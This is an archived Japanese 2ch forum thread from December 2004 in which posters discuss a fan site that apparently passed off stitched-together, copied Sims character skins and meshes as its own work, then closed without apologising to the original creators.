しかしあっという間に100か。チキンハートのぬこシーフタンは、
新スレの保守を駆け抜けた幻だったのかもしれないな…

しかし上で誰かが言っていたが、あ、>>84
2チャネルwがなければ、気付かれるのはかなり遅かっただろうが
気付いた人に教えられたラレ元さん本人が孤軍で戦う事になった訳だよな。多分。
上のような言い訳する奴だから、開き直って逆切れの可能性が高い訳で
今回はヲチスレがちょっと良い事をした気もしてる。

103 :名無しさん@ゴーゴーゴーゴー!:04/12/08 00:24:17 ID:VZwfryYz
>>100
自分には悪気が無かったようには考えられないな。
すぐサイトを消すあたり、悪いことをしているという認識はあったんだと思うよ。
チキンハートの人って対外バレなきゃいいやって、大胆なことをするヤツが多い。
んでもって、自分の悪行を認めたくないんだよな。何故って小心者だから。
チョットでも叩かれるのが嫌なんだよ。だがら自分は悪くないって見栄をはる。
すると嘘が膨らんでいって苦しくなるのは自分だって分かるのに
そのときは先のことを何も考えられないんだよな。

自分も小心者だから気持ちは分かるよ。
でもやっちゃいけないことをやっちゃったんだから
潔く自分の悪行を認めればよかったんだ。
シーフ(・A ・) イクナイ!

長い文ですまん。

104 :名無しさん@ゴーゴーゴーゴー!:04/12/08 00:28:53 ID:VZwfryYz
連続投稿すまん

>>101
自分もそれは思ってた。
というかあれは誰が見ても「BMPに傷書いただけ」って分かったな。

レンタルCGIの掲示板を「自力」と言ってた
古式若葉を思い出してなんだか切なくなった。

105 :名無しさん@ゴーゴーゴーゴー!:04/12/08 01:24:40 ID:vEqZNeZh
わー、チキンハートの人のスキン落としてたよ・・・
ラレ元のも持ってるけどメッシュ素人なので
こういうの流行なのかとしか思ってなかった・・・


106 :名無しさん@ゴーゴーゴーゴー!:04/12/08 08:24:02 ID:/C855jnz
本スレへ報告しに行った奴がいるな。
別にわざわざ知らせんでも……と思ったけど
知らず使ってる人もいるんだろうな、パクリスキン。

>>101
額当てと髪の毛部分を自分で作ったから、
「自作」だと思ってんじゃないの?単なる改造なのにね。
奴にとっては、「自分の手を加えた」時点で
自作スキンになるんだよ、きっと。BMP描き換えでもね。

107 :名無しさん@ゴーゴーゴーゴー!:04/12/08 10:01:28 ID:K5fDZ+wN
つまり

「俺の物は俺の物
お前らの物は俺の物」

「分かるか?心の友よ」

ってことか

108 :名無しさん@ゴーゴーゴーゴー!:04/12/08 10:58:11 ID:1bmxt/lH
すんなり終わったな
バレて閉鎖するくらいなら最初からシーフしなきゃいいのに

109 :名無しさん@ゴーゴーゴーゴー!:04/12/08 15:49:34 ID:c2tJ0rP6
そうなんだよね。
パクって配布なんて、もういつバレてもおかしくないのに何でするんだか。
あっという間に(わざと)姿を消す神出鬼没割れサイトとかと違ってやっぱり悪いことしてるって自覚がないのかね。

110 :名無しさん@ゴーゴーゴーゴー!:04/12/08 17:12:01 ID:WOE0TM01
髪の毛も妙に出来が良い部分は、別サイトのものじゃないかな。
集めてコピーして貼っただけの自作品。

しかしシーフする奴ってのは行動が同じだよな。
悪いことしてる自覚は閉鎖した今も無いんじゃないの。
誰かは知らんが、こんなの刑事事件じゃない何の問題もない。
って言ってる奴もいるし。

111 :名無しさん@ゴーゴーゴーゴー!:04/12/08 17:29:29 ID:HOlz2nr0
本スレの765はここへの誤爆だったん?
絡んでるヤシ、そこはかとなく2チャネルwっぽい

112 :名無しさん@ゴーゴーゴーゴー!:04/12/08 18:20:06 ID:Lz/UI5XB
元々の「自作スキン」の意味を取り違えているんだよ。

掲示板の発言で教えてちゃんへの解答
>シムピープルで自作キャラを作るにはいくつかのソフトが必要です。
>簡単に流れだけ説明しますと、
>1、ゲーム内のデータから改造したいスキン、メッシュを抽出する(ペットの場合ソフト使用)
>2、3Dがいじれるソフトでメッシュを作る(形)
>3、ペイントソフトでスキン(外見の肌)を描く。
>4、スキン、メッシュをゲーム内で使えるようにする(ソフト使用)
>5、ゲームに入れる。

>まずはじめからまったく新しいキャラを作ろうとせずに、
>すでにあるキャラクターを改造することをすすめます。
>Google(検索)にて「シムピープル スキン」などと入れるとスキン製作の解説サイト様がヒットします。
>スキン製作から挑戦してみてください。

113 :名無しさん@ゴーゴーゴーゴー!:04/12/08 19:44:58 ID:gspT1nl/
いや、シーフの自覚は充分あったと思われ。
他のサイトのスキンを参考にしたと釈明しておきながら
リンクはもちろん、一切の注意書きもないって事は
パクってるからこその行為だろう。

114 :名無しさん@ゴーゴーゴーゴー!:04/12/08 19:54:39 ID:idve9+Xg
掲示板のレスの書き込みしかみてないと常識的なことしか
言ってないんだけど、配布したスキンと並行して読んだ場合
にお祭り騒ぎになってるんだろうなぁと思う俺は
お祭り乗り遅れ組。(・_・)y-~

115 :名無しさん@ゴーゴーゴーゴー!:04/12/08 20:27:55 ID:xyyIJckz
なんかまたしてもろくな反応しやがらなかったな。
まあ、こういう時に最善の対応が出来るような人は、
元からパクリなんてしねえしな・・・。

それにしても思うのは、世の中の2ch嫌い(苦手)って言ってる人達って
普段どんな板を覗いてるんだ?
それとも2chといえば叩かれた思い出しかないとかか?

116 :名無しさん@ゴーゴーゴーゴー!:04/12/08 20:53:05 ID:HVSv5KsF
>>115
いまだに 2ch=犯罪者の巣窟 みたいに思ってる人は少なくないと思われ。
そんな人は、どんな板を覗いてる以前に2ch自体を見ていない。
いくら検索ワードで一位を取ったって、ネットやってる人が100パーセント見てるわけじゃないし。

だけど、2chを見ているのに自分はねらーではないと思っている奴や
(見てるだけだから、書きこんでないから私は違うとからしい。)
2chを普通に利用しているのに、自分が叩かれたその時点からいきなり
「ほら、やっぱりねらーは痛い(伝聞)、くず人間の吹き溜まり(伝聞)なのよ!!」
みたいに言い出す奴もたまにいる罠。

117 :名無しさん@ゴーゴーゴーゴー!:04/12/08 20:53:58 ID:WOE0TM01
>>114よ、遅かったじゃないか。どこ行ってたんだ。
お前をずっと待ってたんだぞ!
>>111
あー、誤爆だな。
ラレ元が許せばって書いてあるが、もしや謝って許して貰えたとか?
時間的にも、2チャネルタンの今までの態度的にも考えられないなぁ。

自覚なし厨の過ちなら、普通にラレ元にリンク貼ってそうだし
いっそそこまでしていれば、多少の同情票は入っただろうにな。
二次配布禁止の意味が良く分かっていなかった、と仮定しても
他人様のふんどしスキンを、さも自作品のように
サイト中でけなしまくるなんてのは論外だ。
相手が心の広い職人だとしても、とうてい許して貰える行為とは思えん。

118 :名無しさん@ゴーゴーゴーゴー!:04/12/08 20:57:04 ID:WOE0TM01
>>116
だな。
海老タンも住民なのに、他人みたいな振りしてたしな。

119 :名無しさん@ゴーゴーゴーゴー!:04/12/08 22:27:00 ID:/zdq52/y
114同様、乗り遅れた・・・(´д`;)
>>54の検証画像だけでも見たいYO!


120 :名無しさん@ゴーゴーゴーゴー!:04/12/08 23:42:55 ID:UFTCoNLX
>>119
検証してくれた本人さんじゃないけど
持つところにうpしてよいとおっしゃっていたので( ゚д゚)ノドゾー
(でもここが持つかは知らない)
http://www.uploda.org/file/uporg21375.jpg

121 :名無しさん@ゴーゴーゴーゴー!:04/12/08 23:54:25 ID:/zdq52/y
>>120
アリガトゥ!! (・∀ ・)

コレ、複数のサイトのパーツをつぎはぎしてるね。
しかもポリゴン割れててキタネ・・・

122 :名無しさん@ゴーゴーゴーゴー!:04/12/08 23:57:41 ID:9bJs+BEl
「東京湾の海水はつめーてぞ!」
「は?」

ここにもハゲワロスww
丼って常に一定のテンション保ってるよなw

123 :名無しさん@ゴーゴーゴーゴー!:04/12/08 23:59:46 ID:9bJs+BEl
うわ、すみません誤爆しました・・・

とりあえず、俺もリオタンは一つのサイトだけじゃなく
色んなサイトからパクってんだろなぁと思った。
今までマトモにスキン作った事の無さそうな初心者が
ああいう細かい作業が出来るとは到底思えない。

124 :名無しさん@ゴーゴーゴーゴー!:04/12/09 00:09:21 ID:nW7Y69hP
朴の後ろ髪は見亜たんの?

125 :名無しさん@ゴーゴーゴーゴー!:04/12/09 00:16:25 ID:tGJUjDiC
基本は鉄化け津さんとこの鋼弟猫スキンで
パーツは現送ロンさんとこのの海豚もしくは鹿丸っぽいねぇ

126 :名無しさん@ゴーゴーゴーゴー!:04/12/09 00:23:06 ID:tGJUjDiC
ラレ側のサイトさんには今のところ表面上は反応ないけど
やっぱショックだろうし悔しいだろうし、
創作意欲だって削がれるだろう
パクのサイトが早々に消えたことで重荷は下りただろうが
肝心の謝罪がなかったのは悲しいだろうな

127 :名無しさん@ゴーゴーゴーゴー!:04/12/09 00:56:32 ID:FgxT1a49
海豚の後ろ髪、見亜たんの借用みたいだけど
朴は、訳の分からない所で面がはがされてたりしてキッタナイし
(わざとはがしたのではなく、間違って消してしまって
元に戻せなかったか、気付かなかったかだと思われる)
まったくスキルがない奴だという事が分かるなー。

128 :名無しさん@ゴーゴーゴーゴー!:04/12/09 02:08:34 ID:69imnf0b
ここはスキルの拙さを嘲るスレではない。

129 :名無しさん@ゴーゴーゴーゴー!:04/12/09 02:54:29 ID:FgxT1a49
その通りだが違うよ。
真面目な職人をあざけったりする事は決してない。
スキル自体をあざけってるんじゃない。
見合うスキルを身につける努力をせずに
他人が積み重ねた苦労の上澄みだけかすめとって適当につなぎ合わせて
落とす人も騙してマンセーされようとした部分を哀れんだんだ。

130 :名無しさん@ゴーゴーゴーゴー!:04/12/09 07:32:02 ID:VVV/SorV
思うに、あのパクヌコは最初から配布するつもりはなかったんじゃないかな?
クレクレさんが現れたかなんかで、
「お、需要ある?ここで配れば私も人気配布サイト管理人?」
みたいな感じで欲がでたんじゃないかと。
「他サイトの改造品なので配布できません」
って言えば問題はないんだろうけどね。

いや、全部推測だけど。

131 :名無しさん@ゴーゴーゴーゴー!:04/12/09 07:53:21 ID:VD7LlWgl
>>130
イカスIDですね。

同じキャラ(カップル?)が好きなもの同士で
キャーカワイイ〜と萌え騒ぎたかったんだろうけどなあ…BBSはそんな感じだったし。
それならせめて、オフ友達に配るくらいで止めておけばよかったのにな。
厳密にはこれも二次配布になるので駄目だけどな。

改造不許可になってるものの改造品をオフ友達のみに配るのって
職人さん的にはどうなんだろうか。

132 :名無しさん@ゴーゴーゴーゴー!:04/12/09 07:54:02 ID:DMjQYaU1
>>130
「お、需要ある?ここで配れば私も人気配布サイト管理人?」
の後の行動で運命が分かれる。

よっしゃとばかりに一から作り直す→ネ申
配布しないことにするor元サイトとメールで交渉→常識人
リドミを付けてそのままのまま配布
 例:>*改造などはお好きなだけどうぞ。
   >(できないくらいメチャクチャだからびっくりするけど・・・)
   >*2次配布になる行為はご遠慮ください。
 →→→2チャネルwで哀弗に

133 :名無しさん@ゴーゴーゴーゴー!:04/12/09 08:11:44 ID:H05Van/0
あのサイトがサーチに新規登録された時点では、
改造スキンの配布はしてなかった。
130が書いた「他サイトの改造品なので配布できません」
といった文章も、サイト内にあったような気がする。
掲示板で持ち上げられて、魔がさしたのかね。
でも言い訳が恵比寿と同類だったから、同情の余地はない。

>>125
額当てと髪の毛すら、余所からの流用なのか。
結局、奴が1から作った部分は一つもなかったんだな。

134 :名無しさん@ゴーゴーゴーゴー!:04/12/09 10:49:49 ID:exlitr8e
次にぶっ潰すターゲットマダー?

135 :名無しさん@ゴーゴーゴーゴー!:04/12/09 11:27:25 ID:tN9zAV6E
>134
2チャネルタンですか?

136 :名無しさん@ゴーゴーゴーゴー!:04/12/09 15:10:15 ID:FgxT1a49
>改造不許可になってるものの改造品をオフ友達のみに配るのって
>職人さん的にはどうなんだろうか。

「いかなる形の二次配布も」となっている所は当然ダメだが
そうでない所も、知れば嫌な気持ちにはなるんじゃないかなぁ。
他の誰も知らない場所でほんの2〜3人楽しむ位はいいんじゃないか?
と自分は思わないでもないけどね。
でもそれが例えば人気版権なら、友達から友達、さらにその友達…と伝わって、
改造者本人の意思を越えて広がる可能性も高いし、
二箇所以上で同じ改造キャラ使用のプレイ日記を掲載、という事になれば
結果的には改造二次配布してしまった事と、変わりは無いと思う。

137 :名無しさん@ゴーゴーゴーゴー!:04/12/09 15:14:13 ID:FgxT1a49
ごめん、上は「個人的な改造可」のサイトを前提とした話だった。
>改造不許可
のサイトは、職人が本当に嫌だからそう書いている訳だし
身内で楽むのも、そもそも改造自体してはいけないと思うよ。

138 :名無しさん@ゴーゴーゴーゴー!:04/12/09 18:13:09 ID:wCe3sX1b
アテクシサロンの主人になってチヤホヤされたかったんだろうなあ。
友達欲しくてサイト立ち上げる奴は多かれ少なかれ
トラブルを起こしがち。
リンク募集ページ見てそんなことオモタ。

139 :名無しさん@ゴーゴーゴーゴー!:04/12/09 18:21:36 ID:fv9WKp2V
パクサイトのBBSでスキンを絶賛し
DLの報告もしていたサイトを見てきた。

パクサイトがパクだと知らず日記(非シム)で
パクサイトのことを紹介しリンクまで貼ってくれてる…
(もうバナー画像が表示されてないのが切ない)

…というサイトさんにすら、サイトを閉じたという連絡もないみたいだね

分かりにくい文章でごめん

140 :名無しさん@ゴーゴーゴーゴー!:04/12/09 19:23:35 ID:SvtmDzfq
自分もPr○zeのBBS、1ページだけ保存してあったから
そこからDL報告書き込みした人のサイトへ、ついヲチに行ってしまったよ。

相手サイトさん、そのうち、
何事もなかったかのように削除しちゃうんじゃないでしょうか。<139

141 :名無しさん@ゴーゴーゴーゴー!:04/12/09 22:38:26 ID:Gi1M48Ib
ラレサイトさんにコメントがうpされたね。
やっぱりショックだろうけどこれからも
楽しんでスキン作りしていってほしいな。
事の成り行きと励ましのメール送った人GJ

142 :名無しさん@ゴーゴーゴーゴー!:04/12/09 23:31:48 ID:FgxT1a49
だな。
しかし「コピられ元が許せば何の問題もないことなのに」
って吼えてる奴がいたから
2チャネルタン、まさか謝罪中なのか!?少しは良いとこあるのか!?
と1グラム位は思ってたんたが…やっぱりな。してる訳なかったよな…

まああの言い逃れのままなら、謝罪?もされた方が気の毒だが。

143 :名無しさん@ゴーゴーゴーゴー!:04/12/09 23:33:18 ID:ekEYibxK
あれで「許してくれ」てのも
虫が良すぎて却って腹立つだろうしね

144 :名無しさん@ゴーゴーゴーゴー!:04/12/10 01:21:27 ID:1JcIFaM3
髪の毛と額当ても流用なら、ラレサイトが2つになるわけだし、
許すっていってもどちらかの一存だけでは駄目だろう。
キメラ改造はキメラの相手のこと考えるとどんな職人でも絶対許可出せないと思う。
だから本当の本当に自分のパソコン上だけで、
スクショの公開もしないという時でもない限りは絶対駄目。

>133
開設2日目の11/30のBBSの本人書き込みに
>シムピープル用カカシ&イルカ猫をダウンロード出来るようにしちゃって、
>里親を探そうかななんて準備しちゃっている自分が居ます><
って書いてあるから持ち上げられて魔が差したというより
最初から配る気満々だった気がする。
開設初日にメールでこっそり持ち上げられたのかもしれないけれど
BBSでカウンター数自慢と転送量自慢をしていることから考えると
クレクレコールがメールであったらそれも自慢しそうなのに
していないことから、その可能性は低いと思う。

そういえば恵比寿も以前「半年で××カウント」って日記に書いていたな。
シーフってやっぱりカウンター数気にしてる奴が多いのかな。

145 :名無しさん@ゴーゴーゴーゴー!:04/12/10 01:28:57 ID:1JcIFaM3
引用の中にキャラ名あったのに伏せ忘れた。
スマソ。

146 :名無しさん@ゴーゴーゴーゴー!:04/12/10 01:36:08 ID:uvdjjDt9
チキンハートちゃんと比較しても、恵比寿タンの偉大な愛$っぷりが分かるな。
自分がスキン職人だと仮定すると「シーフ自体」を除けば、どれに対して一番腹立つ?

「シーフされたあげく、相手が…」(←全ての例の前につけてくれ)
 ・謝罪もせずに被害者ぶって逃亡。
 ・何事も無かったように配布続行。
 ・「アテクシ、シーフなんかしてないもん、全部アテクシが作ったんだもん」とみえみえの言い逃れ。
 ・シーフしたスキンを下げず、ある日シーフ部分だけちょいと修正して
  これでオリジナルだろ誰も文句ねーよな。的開き直り。
 ・労作のスキンに対して「へたっぴ」「メチャメチャ」「こんな超へたれスキン」と罵詈雑言を言いまくり。
 ・労作のスキンをシーフしておいて、シーフ部分を修正した時に
  「どうせ豆粒みたいにちっちゃくて見えないから別にどうでもいいんですけどね〜」と
  更に後足で砂をかける発言。

ごめん…自分ならこれだな。と締めるつもりだったけど
改めて書いてみると、どれ一つとして許せるものがなかったわ。

147 :名無しさん@ゴーゴーゴーゴー!:04/12/10 02:04:53 ID:7TD95UGC
ここでも本スレでもシーフ晒しの場があることは、まっとうな製作者からすると
ありがたいことだよ。正直いって。
実際に被害に遭っても、なかなか直接に抗議するのも難しいよ。
逆恨み買う場合もあるし。

148 :名無しさん@ゴーゴーゴーゴー!:04/12/10 02:45:59 ID:uvdjjDt9
ああ、そう思う。
「お気遣い下さった『全て』の方に」って書き方
今回のここ住人(一部除く)も含まれてる気もするんだよな…
ここまでたどり着いたのかも五分五分っぽいんで、うがち杉だろうがな。
特別気遣い発言もせず、楽しく踊っていただけのヲチャ風情がスマソ。

149 :名無しさん@ゴーゴーゴーゴー!:04/12/10 08:06:14 ID:FB7V3q4U
>>146
2チャネル(w)に全ての原因をおしつけて泣き寝入りを装う。

追加汁。

150 :名無しさん@ゴーゴーゴーゴー!:04/12/10 08:41:12 ID:wD+/up42
>>146
どれもこれも嫌過ぎる。
でも149のも含めて、全部本当にあったことなんだよね…

151 :名無しさん@ゴーゴーゴーゴー!:04/12/10 13:44:33 ID:PJV4iw4Z
悪の2chの言う事なんて信じないワ!つーイパーン人って意外に多いから
まかり通ると思われ…>濡れ衣だと主張して泣き寝入りを装う


48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)